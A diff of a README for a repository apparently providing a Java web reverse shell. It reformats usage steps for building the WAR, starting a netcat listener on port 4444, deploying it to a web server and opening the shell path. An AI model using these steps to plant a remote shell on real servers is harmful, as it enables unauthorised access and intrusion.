julien-desca/Java-Web-ReverseShell/README.md

 ## usage

 1.
-`mvn clean install`
-to compile the war
+`mvn clean install` to compile the war

-2.
-`nc -lvp 4444`
+2. `nc -lvp 4444` for listening the connection
-to listen to connection

-3.
-deploy on the web serveur & go to <deploy_path>/shell
+3. deploy on the web serveur & go to <deploy_path>/shell

 4. enjoy your shell